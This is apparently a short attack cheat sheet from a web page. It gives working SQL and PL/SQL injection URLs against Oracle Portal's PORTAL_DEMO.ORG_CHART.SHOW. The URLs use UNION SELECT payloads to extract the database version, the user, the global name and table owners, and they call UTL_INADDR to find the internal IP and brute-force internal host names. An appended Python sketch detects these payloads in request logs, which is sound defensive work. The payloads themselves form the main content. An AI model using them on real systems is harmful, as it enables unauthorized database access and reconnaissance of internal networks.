*** SQL Injection ***
Version:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+banner,null,null,null,null+from+v$version--
User:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+user,null,null,null,null+from+dual--
Actual Database:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+global_name,null,null,null,null+from+global_name--
List of Databases:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+owner,null,null,null,null+from+all_tables--
*** PL/SQL Injection ***
For example, using the function UTL_INADDR.get_host_address we can find the internal address:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union
+select+UTL_INADDR.get_host_address,null,null,null,null+from+dual--
Using a bruteforce attack on the range obtained and the function
UTL_INADDR.get_host_name(), we can acquire a list of internal hosts:
/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?
p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value
%27union+select+UTL_INADDR.get_host_name('INTERNALs-IP'),null,null,null,null+from+dual--
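
Added example (not part of the original page): a detection sketch that decodes the p_arg_names / p_arg_values pairs of a /pls/ request line and flags the patterns shown above. The rule set, the names inspect, RULES and SAMPLE_LOG, and the sample request lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Hypothetical rule set (an assumption, not from the page); applied to
# URL-decoded, lower-cased, whitespace-collapsed argument values.
RULES = {
    "union-select after quote": re.compile(r"'\s*union\s+(all\s+)?select\b"),
    "UTL_INADDR call": re.compile(r"\butl_inaddr\s*\."),
    "dictionary object": re.compile(r"v\$version|\ball_tables\b|\bglobal_name\b"),
    "trailing SQL comment": re.compile(r"--\s*$"),
}

# Constructed request lines for the demo; 192.0.2.10 is a documentation address.
BASE = "GET /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1"
SAMPLE_LOG = [
    BASE + " HTTP/1.1",
    BASE + "&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value'union"
           "+select+banner,null,null,null,null+from+v$version-- HTTP/1.1",
    BASE + "&p_arg_names=_start_with_value&p_arg_values=x%27union+select+"
           "UTL_INADDR.get_host_name(%27192.0.2.10%27),null,null,null,null+from+dual-- HTTP/1.1",
    BASE + "&p_arg_names=_title&p_arg_values=O%27Brien+union+rep HTTP/1.1",
]

def inspect(request_line):
    """Return [(arg_name, [matched rule labels])] for one request line."""
    target = request_line.split()[1]            # "METHOD target PROTO"
    parts = urlsplit(target)
    if not parts.path.lower().startswith("/pls/"):
        return []
    # parse_qsl decodes %27 and '+'; blank values are kept so pairs stay aligned.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    names = [v for k, v in pairs if k == "p_arg_names"]
    values = [v for k, v in pairs if k == "p_arg_values"]
    findings = []
    for name, value in zip(names, values):      # i-th name goes with i-th value
        norm = " ".join(value.lower().split())
        hits = [label for label, rx in RULES.items() if rx.search(norm)]
        if hits:
            findings.append((name, hits))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect(line) or "clean", "<-", line[:90])
```

The last sample line contains a quote and the word "union" in an ordinary value and is not flagged, because the first rule requires the quote to be followed directly by union select.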